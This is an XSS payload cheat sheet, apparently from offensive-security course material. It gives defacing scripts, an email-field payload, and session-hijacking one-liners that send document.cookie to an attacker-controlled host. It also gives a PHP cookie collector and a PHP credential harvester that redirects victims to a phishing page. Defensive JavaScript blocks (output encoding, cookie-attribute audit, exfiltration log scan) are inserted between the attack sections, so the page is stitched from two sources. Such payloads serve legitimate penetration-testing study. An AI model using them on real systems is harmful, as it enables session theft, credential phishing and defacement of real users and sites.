Payloads Tips and Tricks

List of useful XSS payloads, tips and tricks gathered over time

To be tried in email fields (the quoted local part keeps the address syntactically valid, so naive validators accept it)

"<img/src/onerror=alert(0)"@xss.com

Payloads List

Defacing

Attackers can take advantage of stored XSS to change the look of the web application and cause damage to the company's public-facing website. Attackers may deface a website to prove the compromise of the target. Website defacement can have a significant impact on a company's business and affairs.

# Change page title
<script>document.title = 'HackTheBox Academy'</script>

# Change Background
<script>document.body.style.background = "#141d2b"</script>
<script>document.body.background = "https://www.hackthebox.eu/images/logo-htb.svg"</script>

# Change page text
document.getElementById("todo").innerHTML = "New Text"
document.getElementsByTagName('body')[0].innerHTML = "New Text"
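The email-field payload at the top of the page and the defacing scripts above both depend on user-supplied text being written into the page unencoded. The following is an added example, not code from the original page: a small HTML encoder plus two email checks (a naive regex and a conservative one) that show why the quoted-local-part payload passes a loose validator and why output encoding, not validation, is what actually makes it inert. The function names, the regexes and the sample inputs are this example's own assumptions.

```javascript
// Added example (not from the original page). Shows HTML output encoding and
// input validation against the email-field and defacing payloads listed above.
// All inputs below are constructed for illustration.

// Encode the five characters that let attacker-controlled text break out of
// an HTML text node or a double/single-quoted attribute value.
function escapeHtml(str) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(str).replace(/[&<>"']/g, (ch) => map[ch]);
}

// A naive "anything@anything.tld" check, as many forms implement it.
// It accepts the quoted-local-part payload because the quotes and tags sit
// inside the local part, which RFC 5321 allows to be a quoted string.
const NAIVE_EMAIL = /^.+@.+\..+$/;
function naiveEmailCheck(value) {
  return NAIVE_EMAIL.test(value);
}

// A conservative check for the subset of addresses most applications need
// (stricter than RFC 5322): unquoted local part from a small character set,
// DNS-style domain. Quotes, '<', '(' and ')' are rejected outright, so the
// payload never reaches storage in the first place.
const CONSERVATIVE_EMAIL = /^[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)+$/;
function conservativeEmailCheck(value) {
  return CONSERVATIVE_EMAIL.test(value);
}

// Render a stored value into a page fragment. Everything passes through
// escapeHtml, so even a value that slipped past validation cannot become
// markup; the browser shows it as literal text.
function renderProfileRow(email) {
  return `<td class="email">${escapeHtml(email)}</td>`;
}

// Constructed inputs: the page's email payload, a defacing script and a
// plain address.
const PAYLOAD = '"<img/src/onerror=alert(0)"@xss.com';
const DEFACE = "<script>document.title = 'X'</script>";
const BENIGN = 'alice@example.com';

console.log('naive accepts payload:', naiveEmailCheck(PAYLOAD));               // true
console.log('conservative accepts payload:', conservativeEmailCheck(PAYLOAD)); // false
console.log(renderProfileRow(PAYLOAD));
console.log(escapeHtml(DEFACE));
```

Validation and encoding serve different purposes: the conservative regex keeps junk out of the database, while `escapeHtml` protects the page even when data arrives through another path (an import, an admin tool, an older record). The `innerHTML` assignments in the defacing payloads are exactly the sink that encoding on output protects.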

Session hijacking payloads

These payloads can be written in a script.js file hosted on the attacker's web server.

document.location='http://OUR_IP/index.php?c='+document.cookie;
new Image().src='http://OUR_IP/index.php?c='+document.cookie;

PHP payloads for session hijacking

This payload writes the victim's cookies, along with the associated IP address, into a file. It can be saved as an index.php file hosted on the attacker's web server.

<?php
if (isset($_GET['c'])) {
    $list = explode(";", $_GET['c']);
    foreach ($list as $key => $value) {
        $cookie = urldecode($value);
        $file = fopen("cookies.txt", "a+");
        fputs($file, "Victim IP: {$_SERVER['REMOTE_ADDR']} | Cookie: {$cookie}\n");
        fclose($file);
    }
}
?>
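Both the JavaScript exfiltration payloads and the PHP collector above rely on two things a defender controls: that `document.cookie` exposes the session token at all, and that the receiving server sees the token arrive in a query string. The following is an added example, not code from the original page: a `Set-Cookie` audit that reports the attributes (`HttpOnly` first of all) whose absence makes this flow possible, and a scan over constructed access-log lines that flags requests carrying a session cookie name/value pair in their query string, which is what lands in the collector's log. The cookie names, header values and log lines are constructed for this example.

```javascript
// Added example (not from the original page): defensive checks against the
// cookie-theft flow described above. All headers and log lines are constructed.

// Parse one Set-Cookie header value into name, value and an attribute map
// (attribute names lower-cased; valueless attributes such as HttpOnly map to true).
function parseSetCookie(header) {
  const [pair, ...attrs] = header.split(';').map((s) => s.trim());
  const eq = pair.indexOf('=');
  const cookie = { name: pair.slice(0, eq), value: pair.slice(eq + 1), attributes: {} };
  for (const attr of attrs) {
    if (!attr) continue;
    const i = attr.indexOf('=');
    const key = (i === -1 ? attr : attr.slice(0, i)).toLowerCase();
    cookie.attributes[key] = i === -1 ? true : attr.slice(i + 1);
  }
  return cookie;
}

// List the protections missing from a session cookie. HttpOnly is the one
// that directly defeats document.cookie-based theft; Secure and SameSite
// close the transport and cross-site paths.
function auditSessionCookie(header) {
  const c = parseSetCookie(header);
  const findings = [];
  if (!c.attributes.httponly) findings.push('missing HttpOnly');
  if (!c.attributes.secure) findings.push('missing Secure');
  const sameSite = String(c.attributes.samesite || '').toLowerCase();
  if (sameSite !== 'lax' && sameSite !== 'strict') findings.push('SameSite not Lax/Strict');
  return findings;
}

// Session cookie names to look for in query strings (constructed list; use
// the names your own application actually issues).
const SESSION_COOKIE_NAMES = ['PHPSESSID', 'JSESSIONID', 'session'];

// Flag access-log requests whose query string contains a session cookie
// name=value pair. The query is percent-decoded first, because the payloads
// above submit document.cookie via a URL, so '=' and ';' arrive encoded;
// malformed encodings fall back to the raw string instead of throwing.
function findCookieExfilRequests(logLines) {
  const hits = [];
  for (const line of logLines) {
    const m = line.match(/"(?:GET|POST) (\S+) HTTP/);
    if (!m) continue;
    const q = m[1].indexOf('?');
    if (q === -1) continue;
    let query = m[1].slice(q + 1);
    try { query = decodeURIComponent(query); } catch (e) { /* keep raw */ }
    const cookie = SESSION_COOKIE_NAMES.find((name) => query.includes(`${name}=`));
    if (cookie) hits.push({ line, cookie });
  }
  return hits;
}

// Constructed sample data.
const SAMPLE_HEADERS = {
  weak: 'PHPSESSID=abc123; Path=/',
  hardened: 'PHPSESSID=abc123; Path=/; HttpOnly; Secure; SameSite=Lax',
};
const SAMPLE_LOG = [
  '203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?c=PHPSESSID%3Dabc123%3B%20theme%3Ddark HTTP/1.1" 200 0',
  '203.0.113.5 - - [10/Oct/2023:13:55:40 +0000] "GET /index.php HTTP/1.1" 200 512',
  '198.51.100.7 - - [10/Oct/2023:13:56:01 +0000] "GET /search?q=shoes HTTP/1.1" 200 2048',
];

console.log('weak cookie findings:', auditSessionCookie(SAMPLE_HEADERS.weak));
console.log('hardened cookie findings:', auditSessionCookie(SAMPLE_HEADERS.hardened));
console.log('exfil hits:', findCookieExfilRequests(SAMPLE_LOG).map((h) => h.cookie));
```

The log scan is a coarse signal (any parameter that legitimately carries a session id would also match), so in practice it is paired with an allow-list of known endpoints; the cookie audit, on the other hand, is a hard requirement: with `HttpOnly` set, `document.cookie` no longer returns the session token and both exfiltration one-liners above send nothing useful.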

PHP payloads to steal credentials

This payload looks for the username and password parameters in the URL and, if they are present, writes the username and password entered by the victim to a file named creds.txt. It then redirects the user to a legitimate page.

<?php
if (isset($_GET['username']) && isset($_GET['password'])) {
    $file = fopen("creds.txt", "a+");
    fputs($file, "Username: {$_GET['username']} | Password: {$_GET['password']}\n");
    header("Location: http://10.129.142.127/phishing/index.php");
    fclose($file);
    exit();
}
?>

Tools

Automated XSS tools

git clone https://github.com/s0md3v/XSStrike.git
cd XSStrike
pip install -r requirements.txt
python xsstrike.py -u "http://URL.com/?q=query"
